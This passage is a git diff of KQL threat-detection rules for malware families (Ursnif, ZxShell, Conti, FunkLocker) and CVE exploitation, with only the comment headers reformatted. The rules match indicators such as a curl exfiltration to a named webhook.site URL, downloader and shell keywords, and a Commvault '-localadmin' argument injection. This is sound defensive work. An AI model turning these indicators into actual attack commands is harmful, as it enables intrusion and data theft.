 | where FolderPath endswith "/BarracudaMailService" or FolderPath endswith "/resize2fstab" or FolderPath endswith "/resize_reisertab"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql b/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql
index 202c6756..4f32f675 100644
--- a/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql
+++ b/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql
@@ -1,12 +1,12 @@
-// Title: Ursnif Redirection Of Discovery Commands
-// Author: @kostastsale
-// Date: 2023-07-16
-// Level: high
-// Description: Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Ursnif Redirection Of Discovery Commands
+// Author: @kostastsale
+// Date: 2023-07-16
+// Level: high
+// Description: Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/C " and (ProcessCommandLine contains " >> " and ProcessCommandLine contains "\\AppData\\local\\temp*.bin")) and FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\explorer.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/zxshell_malware.kql b/KQL/rules-emerging-threats/Execution/zxshell_malware.kql
index 9c8bac3d..0f4c6957 100644
--- a/KQL/rules-emerging-threats/Execution/zxshell_malware.kql
+++ b/KQL/rules-emerging-threats/Execution/zxshell_malware.kql
@@ -1,12 +1,12 @@
-// Title: ZxShell Malware
-// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
-// Date: 2017-07-20
-// Level: critical
-// Description: Detects a ZxShell start by the called and well-known function name
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.003, attack.defense-evasion, attack.t1218.011, attack.s0412, attack.g0001, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: ZxShell Malware
+// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
+// Date: 2017-07-20
+// Level: critical
+// Description: Detects a ZxShell start by the called and well-known function name
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003, attack.defense-evasion, attack.t1218.011, attack.s0412, attack.g0001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "zxFunction" or ProcessCommandLine contains "RemoteDiskXXXXX") and FolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Exfiltration/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql b/KQL/rules-emerging-threats/Exfiltration/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql
index 31e5a823..40984ec0 100644
--- a/KQL/rules-emerging-threats/Exfiltration/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql
+++ b/KQL/rules-emerging-threats/Exfiltration/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql
@@ -1,12 +1,12 @@
-// Title: Shai-Hulud NPM Package Malicious Exfiltration via Curl
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-09-24
-// Level: high
-// Description: Detects potential Shai Hulud NPM package attack attempting to exfiltrate data via curl to external webhook sites.
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.t1041, attack.collection, attack.t1005, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Shai-Hulud NPM Package Malicious Exfiltration via Curl
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-24
+// Level: high
+// Description: Detects potential Shai Hulud NPM package attack attempting to exfiltrate data via curl to external webhook sites.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1041, attack.collection, attack.t1005, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "curl" and ProcessCommandLine contains "-d" and ProcessCommandLine contains "webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7") and FolderPath endswith "/curl"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Impact/funklocker_ransomware_file_creation.kql b/KQL/rules-emerging-threats/Impact/funklocker_ransomware_file_creation.kql
index 682dd2a9..61cfef4f 100644
--- a/KQL/rules-emerging-threats/Impact/funklocker_ransomware_file_creation.kql
+++ b/KQL/rules-emerging-threats/Impact/funklocker_ransomware_file_creation.kql
@@ -1,12 +1,12 @@
-// Title: FunkLocker Ransomware File Creation
-// Author: Saiprashanth Pulisetti ( @Prashanthblogs)
-// Date: 2025-08-08
-// Level: high
-// Description: Detects the creation of files with the ".funksec" extension, which is appended to encrypted files by the FunkLocker ransomware.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1486, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: FunkLocker Ransomware File Creation
+// Author: Saiprashanth Pulisetti ( @Prashanthblogs)
+// Date: 2025-08-08
+// Level: high
+// Description: Detects the creation of files with the ".funksec" extension, which is appended to encrypted files by the FunkLocker ransomware.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1486, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where FolderPath endswith ".funksec"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Impact/lockergoga_ransomware_activity.kql b/KQL/rules-emerging-threats/Impact/lockergoga_ransomware_activity.kql
index bf5f2f9e..d60a2944 100644
--- a/KQL/rules-emerging-threats/Impact/lockergoga_ransomware_activity.kql
+++ b/KQL/rules-emerging-threats/Impact/lockergoga_ransomware_activity.kql
@@ -1,12 +1,12 @@
-// Title: LockerGoga Ransomware Activity
-// Author: Vasiliy Burov, oscd.community
-// Date: 2020-10-18
-// Level: critical
-// Description: Detects LockerGoga ransomware activity via specific command line.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1486, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: LockerGoga Ransomware Activity
+// Author: Vasiliy Burov, oscd.community
+// Date: 2020-10-18
+// Level: critical
+// Description: Detects LockerGoga ransomware activity via specific command line.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1486, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "-i SM-tgytutrc -s"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Impact/potential_conti_ransomware_activity.kql b/KQL/rules-emerging-threats/Impact/potential_conti_ransomware_activity.kql
index 7e08e896..773d6450 100644
--- a/KQL/rules-emerging-threats/Impact/potential_conti_ransomware_activity.kql
+++ b/KQL/rules-emerging-threats/Impact/potential_conti_ransomware_activity.kql
@@ -1,12 +1,12 @@
-// Title: Potential Conti Ransomware Activity
-// Author: frack113
-// Date: 2021-10-12
-// Level: critical
-// Description: Detects a specific command used by the Conti ransomware group
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.s0575, attack.t1486, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential Conti Ransomware Activity
+// Author: frack113
+// Date: 2021-10-12
+// Level: critical
+// Description: Detects a specific command used by the Conti ransomware group
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.s0575, attack.t1486, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "-m " and ProcessCommandLine contains "-net " and ProcessCommandLine contains "-size " and ProcessCommandLine contains "-nomutex " and ProcessCommandLine contains "-p \\\\" and ProcessCommandLine contains "$"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Impact/potential_dtrack_rat_activity.kql b/KQL/rules-emerging-threats/Impact/potential_dtrack_rat_activity.kql
index df55105f..525b7597 100644
--- a/KQL/rules-emerging-threats/Impact/potential_dtrack_rat_activity.kql
+++ b/KQL/rules-emerging-threats/Impact/potential_dtrack_rat_activity.kql
@@ -1,12 +1,12 @@
-// Title: Potential Dtrack RAT Activity
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019-10-30
-// Level: critical
-// Description: Detects potential Dtrack RAT activity via specific process patterns
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1490, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential Dtrack RAT Activity
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-30
+// Level: critical
+// Description: Detects potential Dtrack RAT activity via specific process patterns
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "\\temp\\res.ip" and ProcessCommandLine matches regex "ipconfig\\s+/all") or (ProcessCommandLine contains "interface ip show config" and ProcessCommandLine contains "\\temp\\netsh.res") or ProcessCommandLine matches regex "ping\\s+-n.{6,64}echo EEEE\\s?>\\s?"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/apache_spark_shell_command_injection_processcreation.kql b/KQL/rules-emerging-threats/Initial Access/apache_spark_shell_command_injection_processcreation.kql
index 19067c7b..70a91bea 100644
--- a/KQL/rules-emerging-threats/Initial Access/apache_spark_shell_command_injection_processcreation.kql
+++ b/KQL/rules-emerging-threats/Initial Access/apache_spark_shell_command_injection_processcreation.kql
@@ -1,12 +1,12 @@
-// Title: Apache Spark Shell Command Injection - ProcessCreation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-20
-// Level: high
-// Description: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1190, cve.2022-33891, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Apache Spark Shell Command Injection - ProcessCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-20
+// Level: high
+// Description: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, cve.2022-33891, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "id -Gn `" or ProcessCommandLine contains "id -Gn '") and InitiatingProcessFolderPath endswith "\\bash"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/atlassian_confluence_cve_2022_26134.kql b/KQL/rules-emerging-threats/Initial Access/atlassian_confluence_cve_2022_26134.kql
index fa8662cb..a7410f63 100644
--- a/KQL/rules-emerging-threats/Initial Access/atlassian_confluence_cve_2022_26134.kql
+++ b/KQL/rules-emerging-threats/Initial Access/atlassian_confluence_cve_2022_26134.kql
@@ -1,10 +1,10 @@
-// Title: Atlassian Confluence CVE-2022-26134
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-03
-// Level: high
-// Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.execution, attack.t1190, attack.t1059, cve.2022-26134, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Atlassian Confluence CVE-2022-26134
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-03
+// Level: high
+// Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.t1190, attack.t1059, cve.2022-26134, detection.emerging-threats
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "bash" or ProcessCommandLine contains "dash" or ProcessCommandLine contains "ksh" or ProcessCommandLine contains "zsh" or ProcessCommandLine contains "csh" or ProcessCommandLine contains "fish" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "python") and InitiatingProcessFolderPath endswith "/java" and InitiatingProcessFolderPath startswith "/opt/atlassian/confluence/"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql b/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql
index 421b5713..f481a546 100644
--- a/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql
+++ b/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql
@@ -1,11 +1,11 @@
-// Title: Commvault QLogin Argument Injection Authentication Bypass (CVE-2025-57791)
-// Author: X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-10-20
-// Level: high
-// Description: Detects the use of argument injection in the Commvault qlogin command - potential exploitation for CVE-2025-57791.
-// An attacker can inject the `-localadmin` parameter via the password field to bypass authentication and gain a privileged token.
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1190, detection.emerging-threats, cve.2025-57791
-
-DeviceProcessEvents
+// Title: Commvault QLogin Argument Injection Authentication Bypass (CVE-2025-57791)
+// Author: X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-20
+// Level: high
+// Description: Detects the use of argument injection in the Commvault qlogin command - potential exploitation for CVE-2025-57791.
+// An attacker can inject the `-localadmin` parameter via the password field to bypass authentication and gain a privileged token.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, detection.emerging-threats, cve.2025-57791
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "qlogin" and ProcessCommandLine contains " -cs " and ProcessCommandLine contains " -localadmin" and ProcessCommandLine contains " -clp " and ProcessCommandLine contains "_localadmin__"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits.kql b/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits.kql
index 422b2798..f93775e5 100644
--- a/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits.kql
+++ b/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits.kql
@@ -1,12 +1,12 @@
-// Title: CVE-2021-31979 CVE-2021-33771 Exploits
-// Author: Sittikorn S, frack113
-// Date: 2021-07-16
-// Level: critical
-// Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.execution, attack.credential-access, attack.t1566, attack.t1203, cve.2021-33771, cve.2021-31979, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: CVE-2021-31979 CVE-2021-33771 Exploits
+// Author: Sittikorn S, frack113
+// Date: 2021-07-16
+// Level: critical
+// Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.credential-access, attack.t1566, attack.t1203, cve.2021-33771, cve.2021-31979, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "CLSID\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\InprocServer32\\(Default)" or RegistryKey endswith "CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24}\\InProcServer32\\(Default)") and (not((RegistryValueData endswith "system32\\wbem\\wmiutils.dll" or RegistryValueData endswith "system32\\wbem\\wbemsvc.dll")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql b/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql
index b13dcffa..712cacbd 100644
--- a/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql
+++ b/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql 
@@ -1,12 +1,12 @@
-// Title: CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum
-// Author: Sittikorn S
-// Date: 2021-07-16
-// Level: critical
-// Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.execution, attack.credential-access, attack.t1566, attack.t1203, cve.2021-33771, cve.2021-31979, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum
+// Author: Sittikorn S
+// Date: 2021-07-16
+// Level: critical
+// Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.credential-access, attack.t1566, attack.t1203, cve.2021-33771, cve.2021-31979, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where FolderPath contains "C:\\Windows\\system32\\physmem.sys" or FolderPath contains "C:\\Windows\\System32\\IME\\IMEJP\\imjpueact.dll" or FolderPath contains "C:\\Windows\\system32\\ime\\IMETC\\IMTCPROT.DLL" or FolderPath contains "C:\\Windows\\system32\\ime\\SHARED\\imecpmeid.dll" or FolderPath contains "C:\\Windows\\system32\\config\\spp\\ServiceState\\Recovery\\pac.dat" or FolderPath contains "C:\\Windows\\system32\\config\\cy-GB\\Setup\\SKB\\InputMethod\\TupTask.dat" or FolderPath contains "C:\\Windows\\system32\\config\\config\\startwus.dat" or FolderPath contains "C:\\Windows\\system32\\ime\\SHARED\\WimBootConfigurations.ini" or FolderPath contains "C:\\Windows\\system32\\ime\\IMEJP\\WimBootConfigurations.ini" or FolderPath contains "C:\\Windows\\system32\\ime\\IMETC\\WimBootConfigurations.ini"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql b/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql
index aa0f682f..035dfbf2 100644
--- a/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql
+++ b/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql
@@ -1,12 +1,12 @@
-// Title: CVE-2024-50623 Exploitation Attempt - Cleo
-// Author: Tanner Filip, Austin Worline, Chad Hudson, Matt Anderson
-// Date: 2024-12-09
-// Level: high
-// Description: Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Celo software suite with suspicious Powershell commandline.
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.execution, attack.t1190, cve.2024-50623, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: CVE-2024-50623 Exploitation Attempt - Cleo
+// Author: Tanner Filip, Austin Worline, Chad Hudson, Matt Anderson
+// Date: 2024-12-09
+// Level: high
+// Description: Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Celo software suite with suspicious Powershell commandline.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.t1190, cve.2024-50623, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -EncodedCommand" or ProcessCommandLine contains ".Download") and FolderPath endswith "\\cmd.exe" and (InitiatingProcessCommandLine contains "Harmony" or InitiatingProcessCommandLine contains "lexicom" or InitiatingProcessCommandLine contains "VersaLex" or InitiatingProcessCommandLine contains "VLTrader") and InitiatingProcessFolderPath endswith "\\javaw.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/dns_rce_cve_2020_1350.kql b/KQL/rules-emerging-threats/Initial Access/dns_rce_cve_2020_1350.kql
index c1d338a1..daaeb3ac 100644
--- a/KQL/rules-emerging-threats/Initial Access/dns_rce_cve_2020_1350.kql
+++ b/KQL/rules-emerging-threats/Initial Access/dns_rce_cve_2020_1350.kql
@@ -1,12 +1,12 @@
-// Title: DNS RCE CVE-2020-1350
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020-07-15
-// Level: critical
-// Description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1569.002, cve.2020-1350, detection.emerging-threats
-// False Positives:
-// - Unknown but benign sub processes of the Windows DNS service dns.exe
-
-DeviceProcessEvents
+// Title: DNS RCE CVE-2020-1350
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-15
+// Level: critical
+// Description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1569.002, cve.2020-1350, detection.emerging-threats
+// False Positives:
+// - Unknown but benign sub processes of the Windows DNS service dns.exe
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\System32\\dns.exe" and (not((FolderPath endswith "\\System32\\werfault.exe" or FolderPath endswith "\\System32\\conhost.exe" or FolderPath endswith "\\System32\\dnscmd.exe" or FolderPath endswith "\\System32\\dns.exe")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/exploited_cve_2020_10189_zoho_manageengine.kql b/KQL/rules-emerging-threats/Initial Access/exploited_cve_2020_10189_zoho_manageengine.kql
index 7231aecb..af860080 100644
--- a/KQL/rules-emerging-threats/Initial Access/exploited_cve_2020_10189_zoho_manageengine.kql
+++ b/KQL/rules-emerging-threats/Initial Access/exploited_cve_2020_10189_zoho_manageengine.kql
@@ -1,10 +1,10 @@
-// Title: Exploited CVE-2020-10189 Zoho ManageEngine
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020-03-25
-// Level: high
-// Description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1059.001, attack.t1059.003, attack.s0190, cve.2020-10189, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Exploited CVE-2020-10189 Zoho ManageEngine
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-03-25
+// Level: high
+// Description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1059.001, attack.t1059.003, attack.s0190, cve.2020-10189, detection.emerging-threats
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "DesktopCentral_Server\\jre\\bin\\java.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql b/KQL/rules-emerging-threats/Initial Access/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql
index 41e21aea..774e5aa8 100644
--- a/KQL/rules-emerging-threats/Initial Access/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql
+++ b/KQL/rules-emerging-threats/Initial Access/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql
@@ -1,10 +1,10 @@
-// Title: Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt
-// Author: Bhabesh Raj
-// Date: 2021-09-08
-// Level: high
-// Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.execution, attack.t1190, attack.t1059, cve.2021-26084, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt
+// Author: Bhabesh Raj
+// Date: 2021-09-08
+// Level: high
+// Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.t1190, attack.t1059, cve.2021-26084, detection.emerging-threats
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "ipconfig" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "wscript") and InitiatingProcessFolderPath endswith "\\Atlassian\\Confluence\\jre\\bin\\java.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql b/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql
index b6f58511..583e70d8 100644
--- a/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql
+++ b/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql
@@ -1,12 +1,12 @@
-// Title: Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon
-// Author: @kostastsale
-// Date: 2022-01-14
-// Level: high
-// Description: Detects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable versions of Log4j.
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1190, cve.2021-44228, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon
+// Author: @kostastsale
+// Date: 2022-01-14
+// Level: high
+// Description: Detects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable versions of Log4j.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, cve.2021-44228, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\ws_TomcatService.exe" and (not((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_cve_2022_26809_exploitation_attempt.kql b/KQL/rules-emerging-threats/Initial Access/potential_cve_2022_26809_exploitation_attempt.kql
index 7038bf52..3249ce87 100644
--- a/KQL/rules-emerging-threats/Initial Access/potential_cve_2022_26809_exploitation_attempt.kql
+++ b/KQL/rules-emerging-threats/Initial Access/potential_cve_2022_26809_exploitation_attempt.kql
@@ -1,12 +1,12 @@
-// Title: Potential CVE-2022-26809 Exploitation Attempt
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-04-13
-// Level: high
-// Description: Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1569.002, cve.2022-26809, detection.emerging-threats
-// False Positives:
-// - Some cases in which the service spawned a werfault.exe process
-
-DeviceProcessEvents
+// Title: Potential CVE-2022-26809 Exploitation Attempt
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-13
+// Level: high
+// Description: Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1569.002, cve.2022-26809, detection.emerging-threats
+// False Positives:
+// - Some cases in which the service spawned a werfault.exe process
+
+DeviceProcessEvents
 | where InitiatingProcessCommandLine contains "-k RPCSS" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql b/KQL/rules-emerging-threats/Initial Access/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql
index 90f0939d..34ece3d8 100644
--- a/KQL/rules-emerging-threats/Initial Access/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql
+++ b/KQL/rules-emerging-threats/Initial Access/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql
@@ -1,10 +1,10 @@
-// Title: Potential Exploitation Attempt Of Undocumented WindowsServer RCE
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
-// Date: 2023-01-21
-// Level: high
-// Description: Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1190, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential Exploitation Attempt Of Undocumented WindowsServer RCE
